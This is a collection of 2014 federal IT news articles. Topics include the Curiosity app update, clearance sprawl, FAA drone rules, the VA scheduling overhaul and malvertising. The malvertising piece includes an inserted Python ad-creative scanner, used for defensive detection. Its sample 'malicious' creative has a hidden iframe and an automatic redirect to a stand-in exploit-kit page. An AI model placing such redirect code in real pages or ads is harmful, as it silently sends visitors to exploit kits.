NASA rolls out big app upgrade as Mars rover mission turns 2

As a celebration of the two-year anniversary of the Mars Curiosity Rover landing, NASA released an update to its 3-D Spacecraft app that features a bunch of new content from the rover’s explorations.
The augmented reality app now offers four new 3-D models of NASA spacecraft that users can interact with and a new image book published by National Geographic.
Before the update, users needed to use an augmented reality target to interact with the models, according to NASA:
“Augmented reality overlays visual content, like 3-D spacecraft models, onto the real-world view from a device’s camera. To view the app’s content, users can print a special target image on a standard sheet of paper. When the device’s camera is pointed at the target, the spacecraft chosen by the user appears onscreen as if it were in the scene.”
Now users can interact with the models in “manual mode,” allowing them to explore them without the need for a target.
The book packaged with the update, titled “Mars Up Close: Inside the Curiosity Mission,” includes photos from Mars Odyssey, Mars Reconnaissance Orbiter, Curiosity, Curiosity’s Descent Stage and the Mars Atmosphere and Volatile Evolution mission.
“Spacecraft 3D makes it so easy for anyone to experience the magic of these spacecraft and the excitement of space exploration,” said Tom Soderstrom, chief technology officer at NASA’s Jet Propulsion Laboratory, where the app was developed. “We think the app will enhance the experience of learning about these missions, for all ages, for years to come.”
As the second anniversary passed on Aug. 5, NASA chronicled the work the Curiosity Rover has completed and what scientists have been doing in the past few weeks:
“Another recent challenge appeared last week in the form of unexpected behavior by an onboard computer currently serving as backup. Curiosity carries duplicate main computers. It has been operating on its B-side computer since a problem with the A-side computer prompted the team to command a side swap in February 2013. Work in subsequent weeks of 2013 restored availability of the A-side as a backup in case of B-side trouble. In July, fresh commanding of the rover was suspended for two days while engineers confirmed that the A-side computer remains reliable as a backup.”
The Spacecraft 3D app is available on both iOS and Android platforms. You can see all of NASA’s app offerings here.
Feeding the government’s hunger for security clearances — literally
It’s no secret the federal government has a voracious appetite for security clearances. But what many probably don’t know is that even if your dream is to prepare and serve lunch to those hard-working analysts at the CIA, NSA or Defense Intelligence Agency, you’re still going to have to pack a top-secret security clearance with cleared access to sensitive compartmented information.

A recent job posting by international food services company Sodexo, based in Gaithersburg, Maryland, said the company’s Government Services Division is looking for an executive chef to “manage all the culinary operations at a high profile government dining account in Northern Virginia.” The right candidate needs to have a “passion for quality food, taste, presentation, menu development” and at least 10 years of experience in an executive chef role. Oh, and he or she will also need a government-issued top-secret security clearance.
Steven Aftergood, the director of the Project on Government Secrecy at the Federation of American Scientists, told FedScoop it is not particularly surprising to see this company — which manages food service at CIA headquarters in Langley, Virginia — require such high-level security clearances for those working on contracts with U.S. intelligence agencies. In this particular case, the employees may very well be working in an undercover status. “So their names, their faces and simply their presence at the facility could be considered secret, even if they do not communicate any classified information,” Aftergood said.
But in a July 16 blog posting, Aftergood said the example sheds light on a very significant policy problem, namely the government’s use of the security clearance process as an employee screening tool. “This use of the national security clearance process has contributed to the skyrocketing growth in security-cleared personnel,” Aftergood wrote.
As of October 2013, the number of people eligible for access to classified information had ballooned to 5.1 million, including more than 1.5 million with top-secret clearances. According to an Office of the Director of National Intelligence report, only 60 percent of those people had access to classified information, suggesting that vastly more clearances are being requested and granted than are actually required, Aftergood wrote.
In a February report to the president on the current status of the government security clearance process, the Office of Management and Budget warned the growth in the number of security clearance investigations has not only outstripped the government’s ability to keep up but has also cost taxpayers billions of dollars and may, in the end, be putting classified information at greater risk of being exposed.
“[The] growth in the number of clearance-holders increases costs and exposes classified national security information, often at very sensitive levels, to an increasingly large population,” the OMB report states.
“A larger number of clearances is harder to manage and maintain, and more prone to human error, than a smaller, more streamlined cleared population,” Aftergood said. “It’s also more expensive. So yes, non-essential clearances should be avoided in the interest of preserving the integrity and efficacy of the personnel security system.”
FAA rule for model aircraft too narrow, commenters say
As the Federal Aviation Administration prepares to issue guidelines for how it will handle unmanned aircraft systems, the agency is tightening what constitutes a model aircraft so there’s no confusion between the two.
According to an interpretation of the special rule for model aircraft posted by the FAA on Regulations.gov, a model aircraft must be flown as a hobby, not weigh more than 55 pounds, not interfere with manned aircraft, not fly within five miles of an airport without prior permission and adhere to a set of community-based guidelines.

(Credit: FAA Interpretation of the Special Rule for Model Aircraft)
The special ruling for model aircraft comes from section 336 of the FAA Modernization and Reform Act of 2012, which defined them as any unmanned aircraft that fly within the line of sight of the person operating them for hobby or recreational purposes.
Under the act, if an aircraft meets the criteria of a model aircraft, it is not subject to further FAA ruling. In the new interpretation, the agency said if a remote controlled craft does not meet the requirements, it will be classified as an unmanned aircraft and must adhere to any future regulations.
So far, the posting on Regulations.gov has warranted more than 29,000 comments from individuals, anonymous users, think-tanks, organizations and academies.
The Information Technology and Innovation Foundation said in its comment the interpretation of the rule for model aircraft is too narrow and could place unnecessary burdens on recreational model aircraft users.
Specifically, the foundation cites the FAA’s prohibition on the use of first-person-view goggles, because the technology would impede the operator’s direct line of sight, one of the main criteria for classifying an aircraft as a model aircraft.
Instead of issuing blanket interpretations, like prohibiting the use of the goggles for model aircraft, Alan McQuinn, a research assistant for ITIF and co-author of the foundation’s comments to the FAA, told FedScoop the agency should look at new technologies on a case-by-case basis.
“We recommend that the FAA not create rules to stop technologies but address them as each of them come into light, because a lot of this technology is still growing,” McQuinn said. “We recommend that the FAA work with community-based standards that already exist around these technologies and are evolving around these technologies to create a ruling for each of them.”
ITIF also encouraged the agency to use another approach to help distinguish between commercial and noncommercial UAS and establish rules to qualify each before issuing guidance on drones in 2015.
“The distinction is tenuous because if they’re regulating for safety, a drone right now being flown by someone who is just a model aircraft enthusiast who takes it up 300 feet and takes a picture of his house, that’s totally legal,” McQuinn said. “But if he takes that picture and sells it, that’s a $10,000 fine. That is a little ridiculous. So if they’re using those standards going forward, we will continue to file comments and advocate for looking at drones in a commercial light that gives them the ability to innovate within the spectrum.”
The Academy of Model Aeronautics also found some areas of the FAA’s interpretation objectionable and said the language of the law — which refers to community-based guidelines, some of which were created by the AMA — required no interpretation.
“The interpretive rule specifically addresses model aircraft operated within the safety programming of a nationwide community-based organization, AMA,” the academy said in its comments. “[The FAA] effectively establishes new rules to which model aircraft were not previously subjected.”
AMA also requested the FAA extend the comment period on the Regulations.gov posting from July 25 until Sept. 23. The FAA granted that request.
The agency’s model aircraft interpretation comes as it plans to release guidelines for the use of unmanned aircraft systems, commonly referred to as drones, in the coming months. The agency’s inspector general reported last month, however, that the guidelines could be delayed.
There have also been reports of an executive order in the works from President Barack Obama that would create a set of privacy guidelines for commercially operated drones.
According to a source familiar with the potential executive order, the White House National Security Council organized an intergovernmental working group last year to examine the issue. The group then tasked the National Telecommunications and Information Administration with developing and enforcing a set of privacy guidelines.
NSC spokesperson Ned Price told FedScoop via email the White House had no comment on any potential executive order but that an interagency review of the issue was underway.
During a July 24 press gaggle in Los Angeles, deputy White House press secretary Eric Schultz would not comment on the specifics of an executive order regulating privacy for commercial drones.
“What we have said on this issue in the past is that the interagency continues to develop and review policies concerning the domestic use of unmanned aircraft systems, and that remains the case,” Schultz said.
FCC opens entire set of net neutrality comments to public
The Federal Communications Commission released files Tuesday containing the full library of more than 1.1 million public comments directed at the commission’s Open Internet plan.
Six XML files were released on the commission’s Electronic Comment Filing System (ECFS), totaling 1.4 GB in size.
“The release of the comments as open data in this machine-readable format will allow researchers, journalists and others to analyze and create visualizations of the data so that the public and the FCC can discuss and learn from the comments we’ve received,” wrote Gigi B. Sohn, special counsel for external affairs at the FCC, in a blog entry. “Our hope is that these analyses will contribute to an even more informed and useful reply comment period, which ends on Sept. 10.”
Comments that were mailed to the FCC prior to July 18 are still being uploaded to the system and may not be included in the first wave of files. Sohn says they will be included as they are scanned into the system.
“To be clear, every comment will be reviewed as part of the official record of this proceeding,” Sohn wrote.
The XML files give the public a different means of searching through the comments on the ECFS website. That system came under scrutiny after “Last Week Tonight” host John Oliver called on the public to weigh in on the net neutrality debate, which crashed the ECFS system.
We’ve been experiencing technical difficulties with our comment system due to heavy traffic. We’re working to resolve these issues quickly.
— The FCC (@FCC) June 2, 2014
We’re still experiencing technical difficulties with our comment system. Thanks for your patience as we work to resolve the issues.
— The FCC (@FCC) June 2, 2014
Sohn hopes the data continues to spur the already-rigorous debate up until the comment period closes.
“We’re hoping that those who do have the technical know-how will develop and share these tools for the public to use,” Sohn wrote. “Open data is an important step towards greater transparency in public deliberations. We look forward to seeing and benefitting from the fruits of your efforts and welcome your ideas on how to make this data even more useful.”
Energy Department rolls out free public access to department-funded research

The Energy Department has launched a portal that will give the public access to scientific journals and peer-reviewed manuscripts tied to the department’s research.
The Public Access Gateway for Energy and Science (PAGES) portal debuted with “thousands of articles from multiple publishers,” according to its landing page, and plans to add 20,000-30,000 articles per year. PAGES, developed by the Energy Department’s Office of Science and Technical Information, is an effort by the department to meet a White House directive to open access to federally funded scientific research.
“Increasing access to the results of research funded by the Department of Energy will enable researchers and entrepreneurs to capitalize on our substantial research and development investments,” said Secretary of Energy Ernest Moniz in a release. “These new policies set the stage for increased innovation, commercial opportunities, and accelerated scientific breakthroughs.”
Publishers looking to get their work on PAGES can submit items through the Clearinghouse for the Open Research of the United States, which has partnered with DOE to populate PAGES rather than having separate feeds from individual publishers.
Journals that have material on PAGES as of the launch include the American Academy of Arts and Sciences, the American Chemical Society, the American Society of Mechanical Engineers and Oxford University Press, among others.
Currently, the articles in the PAGES system are for “demonstration purposes” as the portal goes through a beta period. As of Oct. 1, 2014, any publication published from a DOE National Laboratory will be expected to submit “manuscript metadata and links,” with full-text access given within a 12-month window.
PAGES mirrors a similar service available from the National Institutes of Health — PubMed Central — that serves as a digital archive of biomedical and life sciences research. PubMed Central offers an archive of 3.1 million articles open to the public.
An international alliance of academic and research libraries said that while the PAGES launch is a step in the right direction with regard to the White House’s plan, there are “clearly mixed results” with the Energy Department’s offering. The Scholarly Publishing and Academic Resources Coalition (SPARC) said PAGES blurs the line between open access and journals’ copyright.
“The DOE plan does not adequately address the reuse rights that are necessary for the public to do more than simply access and read individual articles,” Heather Joseph, executive director of SPARC, said in a release. “Without clearly articulating these reuse rights, the public’s ability to download, analyze, text mine, data mine and perform computational analysis on these articles is severely limited, and a crucial principle of the White House Directive cannot be fully realized.”
The Energy Department made clear in a statement to FedScoop that it draws a line between “public access” and “public domain.”
“Being publicly accessible does not mean that publications are in the public domain. Publishers maintain their rights under copyright to their Version of Record and publishers partnering with DOE on public access make their content publicly available voluntarily,” said Brian Hitson, director of the Energy Department’s Office of Science and Technical Information. “Although accepted manuscripts or articles will be accessible to the public, copyrights are still retained, and subsequent re-use must be in accordance with applicable copyright restrictions and copyright law. Any other use must be by permission of the copyright owner.”
While PAGES may present hurdles for those looking to mine data, DOE is requiring research funding proposals to be submitted with a data management plan as of Oct. 1. The plan must detail how much data the project will generate and how that data will be shared or preserved.
You can access PAGES here.
USASpending.gov awards don’t match real agency expenses
USASpending.gov has made a solid effort to increase transparency in how the federal government handles taxpayer money each year, but when comparing the data on the website to agency records, the Government Accountability Office found it’s riddled with inconsistencies.
Congress decided in 2006 that taxpayers deserve to know how the federal government spends trillions of dollars each year in contracts and awards, so it enacted the Federal Funding Accountability and Transparency Act and required the Office of Management and Budget to establish a public website to highlight federal awards. Of 37 agencies with a budget authority of more than $400 million, GAO found that 33 had managed to report at least one contract for fiscal year 2012 on USASpending.gov, while the other four claimed exemptions.
However, not much of what was on the website was consistent with actual agency records, according to the GAO study. “GAO estimates with 95 percent confidence that between 2 percent and 7 percent of the awards contained information that was fully consistent with agencies’ records for all 21 data elements examined,” the report said. “The element that identifies the name of the award recipient was the most consistent, while the elements that describe the award’s place of performance were generally the most inconsistent.”
Additionally, most agencies failed to immediately report information on assistance awards, which totaled hundreds of billions of dollars. “We found that agencies generally reported information on contracts but did not report timely assistance information, leading to underreporting of nearly $619 billion for awards made in fiscal year 2012,” GAO said. “Many of those awards were subsequently reported by agencies.”
As time went on, agencies subsequently reported more and more of the previously unreported or improperly reported awards, a total that grew from $2.6 trillion in February 2013 to $3.2 trillion by April 2014. Agencies cited many reasons for not reporting awards on USASpending.gov properly, including technical issues, aggregation of awards, unclear understanding of reporting requirements and lack of internal oversight.
This isn’t the first problem GAO has identified regarding USASpending.gov data. In March 2010, GAO found OMB’s compliance with FFATA to be lacking in some areas, such as the requirement to report about the website to Congress. A sample of 100 awards audited all had at least one data error, and reports on programs at nine agencies for fiscal year 2008 were missing. And again in July 2012 and September 2013, GAO reported similar inadequacies.
OMB placed the responsibility in the hands of the agencies to make sure what they were uploading to USASpending.gov was fully and accurately reported. After this audit, GAO said “this approach has had limited effect on the overall quality of the data on the website, reinforcing the need for a more comprehensive oversight process by OMB and more specific guidance from OMB on how agencies are to validate information reported to USASpending.gov. Until these weaknesses are addressed, any effort to use the data will be hampered by uncertainties about accuracy.”
GAO recommended that OMB implement governmentwide oversight to “regularly assess the consistency of information reported by federal agencies to the website other than the award amount.”
VA poised to kick off contract for new scheduling system
The Department of Veterans Affairs has completed a series of one-on-one meetings with companies interested in taking on what is perhaps the biggest, most complex and important government IT challenge since the rollout of healthcare.gov — replacing VA’s antiquated patient scheduling system with commercial technologies that will enable veterans to see doctors and receive treatment when and where they need it.
The department is scheduled this month to release a request for proposals for its Medical Appointment Scheduling System, which will replace the patient scheduling module within the Veterans Integrated System Technology Architecture, VA’s main electronic health record system known as VistA. The scheduling system has been at the heart of the scandal involving veterans who died waiting for care after being placed on so-called secret wait lists. But VA officials recently outlined an aggressive plan to completely overhaul VistA scheduling along with the cultural and business process challenges that have contributed to VA’s problems.
“We need to solve scheduling because this is our core mission,” said Mike Davies, director of the Access Clinic Administration Program at the Veterans Health Administration, speaking June 18 at a MASS industry day hosted by VA. “We want to make appointments just in time [and] we want truth in scheduling.”
A VA spokesperson told FedScoop the agency is still finalizing the acquisition process and the timeline for the contract.
VistA’s scheduling module plays a much more fundamental role in the larger cycle of patient care and VA operations than previously disclosed. VistA scheduling not only gets veterans appointments, but the data generated by the scheduling system is critical to the long-term management of VA’s medical practices and finances. Everything from health trends in specific populations of veterans to the amount of federal reimbursements provided to individual VA clinics is tied to the VistA scheduling system. Adding to the importance of a robust scheduling module are VA’s plans for telehealth, an army of home care providers that is offline in remote locations for extended periods of time and the agency’s plans for mobile and Web-based self-service applications.
“There are three things we have to measure: We have to know patient demand — how many appointments are made or created in a given timeframe; we have to know supply — how many appointment slots are available to meet that demand; and we have to know activity — how many of those appointments are actually completed,” Davies said. In addition, VA needs to know the cancel rate (which currently stands at a whopping 13 percent and is attributed largely to problems with VistA), the reschedule rate, the cancel and reschedule rate (those who cancel and never reschedule their appointments), the no-show rate and the revisit interval.

“The scheduling system needs to support these care coordination agreements between practices,” Davies said. And right now, VistA scheduling is having a difficult time simply matching appointment requests to available medical resources.
VistA is 30 years old; its scheduling component dates back to 1984. And while it has undergone many upgrades and changes, VistA remains an outdated system incapable of keeping up with the massive increase in patient demand that has resulted from the wars in Iraq and Afghanistan as well as an aging veteran population. The number of veterans enrolled in the VA health care system has increased from 5.1 million in 2001 to more than 9 million in 2013. The VA employs 50,000 schedulers who make 113 million appointments per year covering 154 medical centers and more than 700 community-based outpatient centers. But the inability of VistA to provide a single, enterprisewide view of scheduling means these tens of thousands of entry-level workers must deal with multiple appointment types that cut across medical disciplines, are only accessible through different screens on their system and must accurately match patient requests to one of VA’s 125,000 physicians.
“The core problem we’re trying to solve is that we do not know what our provider supply is,” Davies said. Because of VistA, VA is one of the only medical organizations of its size that currently cannot determine how many appointment slots those doctors are staffing, he said.
VistA’s poster child
According to Davies, VA’s mental health practice is the “poster child” for the problems created by VistA scheduling.
“If I’m a psychiatrist, the way the VistA scheduling system is designed is I will have actually on average seven different clinics or profiles or grids. So I have one grid for military sexual trauma, one grid for addictions, one grid for general mental health and on and on. These grids are the way VistA scheduling collects data that often ends up getting reported to Congress,” Davies said. And while counting schedule types is important, VA’s schedulers “must have multiple screens open to check and make appointments in specific grids,” he said. The proliferation of scheduling grids, each only accessible through a separate screen, makes errors and even deliberate gaming of the scheduling system easy.
“It’s a nightmare,” Davies said. “It’s a Gordian knot really, and it’s highly error-prone. This system is really great at collecting data, but it is not really great at matching a need, demand or a request to a resource.”
Making progress
VA plans to acquire its new commercial off-the-shelf (COTS) scheduling module in three phases. The first phase, known as version 1a, will provide immediate, short-term improvements to local scheduling. By Oct. 1, the agency plans to replace VistA’s current graphical user interface — described by Davies and other VA officials as a “roll-and-scroll” interface — with a calendar-based view that pulls everything together in one screen view. But it still won’t pull all of the profiles together just yet. “At least we’ll have one,” Davies said.
Another contract on the horizon “will deliver a better resource management dashboard, an aggregated view of clinical schedules and a single queue of request lists so the scheduler can see the near list, the recall list and the [electronic waiting list] all in one place,” Davies said. That effort is designed to “eliminate any hint of a secret waiting list out there and make sure that the pathway between requests and the scheduler’s desk is absolutely clear, transparent and error-proof,” he said.
The first phase will also include connecting VistA scheduling to a recently developed clinical video teleconferencing capability.
Gary Monger, a product engineer in the Architecture Strategy and Design Group within VA’s Office of Information and Technology, said there are a lot of integration points between VistA scheduling and other legacy VistA applications that will be handled through federated VistA scheduling adaptors that the vendor who wins the contract must develop. “There’s significant risk, cost and time associated with migrating those integration points to a new COTS scheduling application,” Monger said. “So the initial approach is to push that appointment data into the legacy VistA scheduling application.”
The second phase, known as version 1b, calls for COTS implementation within VistA. This phase will give VA time to standardize and modify non-scheduling business practices to account for the new technologies.
The final phase, known as version 2, will begin the full-scale switch to a COTS-based replacement of VistA scheduling capabilities. There is no word on the exact timing of these phases, but officials said it will take several years before all VistA applications can be integrated with the new scheduling module.
Davies said VA has also developed a mobile app that will allow patients to request an appointment, and one is currently in development that will allow patients to schedule an appointment. He described the efforts as an attempt to make forward movement while the new system is being designed.
“What we’re really looking for is the ability regardless of how the veteran comes to us, whether they’re working on a mobile app or they’re coming through a portal or their own phone, that they get the same experience,” Monger said.
“Failure is not an option,” Gerry Lowe, director of Veteran Facing Applications, said. But success won’t be easy either. “For the vendor who’s lucky enough to actually get this award, you’ll be writing your own ticket in the annals of VA. If you’re successful…you’re going to get a hell of a past performance [evaluation].”
Infor partners with Northrop Grumman to expand federal profile
Enterprise software company Infor announced a partnership Tuesday with Northrop Grumman aimed at boosting its federal sector offerings.
Northrop Grumman will help New York-based Infor implement a suite of applications — human resource management, financial management and continuous monitoring — specifically suited for the federal government.
“Infor understands that the federal government’s responsibilities do not begin and end in a standard 8-5 work day,” said Wayne Bobby, Infor’s vice president of federal government solutions, in a release. “By partnering with other leaders in the federal space, such as Northrop Grumman, we are equipping organizations with the tools they need to keep daily processes running efficiently 24 hours a day, seven days a week.”
Infor announced earlier this year it was expanding its efforts into the public sector, hiring Bobby, the one-time Oracle executive and head of federal management services for the State Department.
Jun Choi, director of enterprise business solutions at Northrop Grumman, said the partnership with Infor will allow agencies to operate “faster and smarter.”
“By partnering with Infor, we can offer these organizations access to leading applications…that will allow them to spend less time focusing on internal operations and more time prioritizing service to citizens,” Choi said.
Financial terms of the partnership were not disclosed.
Why your agency needs to worry about ‘malvertising’

Any federal workers taking breaks from their jobs to visit mainstream news websites may be exposed to exploit kits just by loading the page, according to a new report from Cisco Systems.
The company released its 2014 Midyear Security Report Tuesday, which focuses on a number of low-key, low-risk vulnerabilities that hackers are using to exploit systems and access data.
Levi Gundert, the technical lead for Cisco’s threat research, analysis and communications team, said cybercriminals are purchasing last-minute ad packages in the hopes that their kits — which may only show up every 100 or 1,000 ad impressions — make it through the exchange’s security measures.
Malvertising then takes it one step further: Even hackers know clickthrough rates for online display ads are infinitesimal, so the exploit kits do not require the user to actually click on an ad.
“You load the page, the ad is loaded with it and you are instantly redirected because it contains either an iFrame or some JavaScript that says ‘redirect browser,’ and that address is an exploit kit landing page,” Gundert said. “It’s completely transparent to the user. If they haven’t patched their applications, if they haven’t patched Windows, haven’t patched their browser, they’re instantly exploited.”
The malvertising also takes advantage of Internet users’ unfamiliarity with the maze of ad networks that mainstream sites partner with, making it virtually undetectable to the average user’s eye.
“Folks don’t understand the risk, they don’t understand how it works,” Gundert said. “They don’t understand that when you go to CNN.com, they have hundreds of external relationships with parties off the site — content delivery networks, advertising exchanges — that’s the primary mechanism that’s feeding the redirection.”
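As an added illustration of the mechanism Gundert describes (this is not code from Cisco’s report or from the article), the following scanner performs the kind of static check an ad exchange could run on a creative before serving it. It flags the two no-click redirect patterns described above, a hidden iframe and a script that navigates the browser at load time, plus a meta refresh and any embedded asset fetched from a host outside an allowlist. The approved-host list, the hostnames and both creatives are constructed for the example.

```python
"""Static scan of an ad creative for no-click redirects.  Added example; the
approved-host list and the two creatives at the bottom are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts the exchange has vetted to serve creative assets.
APPROVED_HOSTS = {"cdn.example-adserver.test", "ads.example-exchange.test"}

# JavaScript that navigates the (top-level) document at load time: assignments
# like `top.location.href = ...` or calls like `location.replace(...)`, but not
# comparisons (`location.href == ...`) or plain reads (`location.hash`).
NAV_RE = re.compile(
    r"\b(?:(?:top|parent|window|document|self)\.)*location"
    r"(?:\.(?:href|replace|assign))?\s*[=(](?!=)"
)


def _px(value):
    """Parse a width/height attribute such as '1' or '1px'; None if non-numeric."""
    if value is None:
        return None
    value = value.strip().lower()
    value = value[:-2] if value.endswith("px") else value
    return int(value) if value.isdigit() else None


def _is_hidden(attrs):
    """An iframe the user cannot see: display:none, visibility:hidden or <= 1px."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    return (w is not None and w <= 1) or (h is not None and h <= 1)


class CreativeScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None  # accumulates the body of the <script> being read

    def _check_host(self, tag, url):
        host = urlparse(url).hostname
        if host and host not in APPROVED_HOSTS:
            self.findings.append(f"<{tag}> loads from unapproved host {host}")

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        # Click destinations (<a href>) are legitimately third-party and are not
        # checked; assets that load with the page must come from approved hosts.
        if tag in ("iframe", "script", "img", "embed", "object"):
            src = a.get("src") or a.get("data")
            if src:
                self._check_host(tag, src)
        if tag == "iframe" and _is_hidden(a):
            self.findings.append(f"hidden iframe -> {a.get('src')}")
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.findings.append(f"meta refresh -> {a.get('content')}")
        if tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            for m in NAV_RE.finditer("".join(self._script)):
                self.findings.append(
                    f"script navigates without a click: {m.group(0).strip()}")
            self._script = None


def scan_creative(html):
    """Return a list of findings; an empty list means nothing suspicious."""
    p = CreativeScanner()
    p.feed(html)
    p.close()
    return p.findings


# Constructed creatives: a normal clickable banner, and the pattern described
# above (hidden iframe plus a load-time redirect fired on a fraction of
# impressions, so that a casual look at the ad shows nothing).
BENIGN = """
<a href="https://advertiser.example/landing" target="_blank">
  <img src="https://cdn.example-adserver.test/banner-300x250.png" width="300" height="250">
</a>
<script src="https://ads.example-exchange.test/pixel.js"></script>
"""

MALICIOUS = """
<img src="https://cdn.example-adserver.test/banner-300x250.png" width="300" height="250">
<iframe src="https://cheap-host.example/ek/landing.php" width="1" height="1"></iframe>
<script>
  if (Math.random() < 0.01) {            // one impression in a hundred
    top.location.href = "https://cheap-host.example/ek/landing.php";
  }
</script>
"""

if __name__ == "__main__":
    for name, creative in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(name, scan_creative(creative) or "clean")
```

Two caveats follow from the article itself. Because the kit is shown only once per hundred or thousand impressions, and the redirect can be decided server-side rather than in the creative’s markup, a one-off review of a sample creative proves little; the check has to run on every variant actually served, and it belongs next to a proxy- or endpoint-side monitor that watches for page loads followed immediately by a navigation to a domain nobody on the site has a relationship with. And because a legitimate clickable ad navigates through an anchor the user clicks, the scanner deliberately ignores `<a href>` destinations and treats only script- or markup-driven navigation as suspicious.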
While Gundert said he has had conversations with leading ad networks to solve the problem, it is crucial that agency chief information security officers and chief information officers take the time to plan for these exploits as workplace culture continues to change.
“So much [security] effort has been put on the perimeter,” he said. “There is no perimeter any more. We all work remotely, we all work on the go, we all work on the road and there are restrictions in government, but they are going to fade over time.”
WordPress problems?
The report also highlights a number of rising threats, including exploit kits being staged on popular content management systems like WordPress. Attackers are becoming particularly adept at compromising neglected sites that nobody maintains anymore, then using them to “upload malicious binaries and use them as exploit delivery sites.”
“There are millions of installations and instances of CMS software and people don’t care about security, they just want to run the site,” Gundert said. “There are fundamental vulnerabilities in older versions, there are vulnerabilities in the third-party add-ons that [hackers] are exploiting.”
Java still hot — for hackers
Java exploits represented 93 percent of all indicators of compromise measured by the company, up 2 percentage points since Cisco’s last report.
“Java’s extensive attack surface and high return on investment are what make it a favorite for adversaries to exploit,” reads the report, which also says Microsoft Silverlight is becoming a key target for exploit kits.
Can CISOs ever sleep?
The 50-page report, which covers a number of other vulnerabilities, is enough to give any seasoned cybersecurity official a reason to sweat. However, Gundert said the best way to defend against attacks is to expect them, no matter how prepared an agency may be.
“You can absolutely think about threats, you can inspect threats, you can expect that you are going to be compromised and really shorten that detection window,” Gundert said. “I think that’s where people need to focus. As a CISO, you sleep better at night knowing ‘Yes, this is a real attack, this is probably going to happen to us, but we have a very smart team in place and we are going to detect it and it’s going to be a really short remediation window.’”
You can read Cisco’s full report here.
5 IT legislative initiatives that went nowhere before recess
Congress started a five-week recess Aug. 1 and left several IT bills on the table. Here are the five major IT initiatives lawmakers failed to act upon before skipping town.
The Federal Information Technology Acquisition and Reform Act
Status: Passed House, Passed Senate Committee, Awaiting Action on Senate Floor
The first rumblings of what became FITARA appeared in a report released by the Government Accountability Office in February 2012 that identified roughly $1.2 billion in potentially duplicative federal IT spending. In response, House Oversight Chairman Rep. Darrell Issa, R-Calif., circulated a draft bill of FITARA.
Before the bill was formally introduced, Rep. Gerry Connolly, D-Va., cosponsored it. Since its introduction, the bill has passed the House three times, but in slightly different forms.
Most recently, the second version of the bill moved on to the Senate, where it passed the Homeland Security and Governmental Affairs Committee.
The bill, if passed, would consolidate the position of CIO across federal agencies, allowing only one person to hold the title per agency. In addition, the bill gives that individual greater authority over the agency’s IT.
Permanent Internet Tax Freedom Act
Status: Passed House, Awaiting Referral in Senate
Passed originally in 1998, the Internet Tax Freedom Act barred any tax on Internet access except in states that already had one when the act was signed. Since its passage, the act has been renewed three times. The current renewal is set to expire on November 1, 2014.
The November 1 deadline is particularly pressing given that Congress will return to session on September 8, allowing less than two months for the original act to either be extended or for the permanent moratorium to be passed.
Differing from the 1998 bill, PITFA would revoke the state-based Internet access taxes in seven states that had them in place before the original ITFA passed. The bill passed through committee in June and then the full House a few weeks later.
The Federal Information Security Modernization Act of 2014
Status: Passed Senate Committee, Awaiting action on Senate Floor
Enacted in 2002, the original Federal Information Security Management Act (FISMA) required agencies to establish information security programs and to meet a set of standards for protecting their information and systems. The act also set out the qualifications those standards must meet.
The 2014 update does not rewrite the original law, but it removes some of the original reporting requirements. In addition, some requirements about how OMB oversees the law’s implementation will be adjusted.
The bill passed the Senate Homeland Security and Governmental Affairs Committee, and a similar version of the bill passed the House a year prior.
Various cybersecurity bills
Status: Miscellaneous
A number of cybersecurity bills were also left without much action before recess. The National Cybersecurity and Critical Infrastructure Protection Act of 2014, which codifies the cybersecurity responsibilities of the Department of Homeland Security, passed the House last week and has been referred to committee in the Senate.
Also dealing with DHS, the Cybersecurity Boots on the Ground Act also passed the House last week and was also referred to committee in the Senate.
In addition to the 2014 cybersecurity bills in progress, several bills remain leftover from the 2013 legislative calendar, some of which were introduced in the 112th Congress. A few other bills, including one introduced by Sen. Kirsten Gillibrand, D-N.Y., made appearances last week before Congress left town.
USA FREEDOM Act
Status: Passed House, Referred to Senate Committee
In the wake of Edward Snowden’s revelations about the National Security Agency, members of both houses of Congress spoke about legislation necessary to address the agency’s activities.
The USA FREEDOM Act was introduced in both houses in late 2013 and was designed to end the bulk data collection on Americans. Since its introduction, it has passed the House and been referred to the Senate Judiciary Committee.
The bill, after being amended in May 2014, would also extend the controversial Patriot Act and amend it to ensure any data collected from citizens is absolutely essential.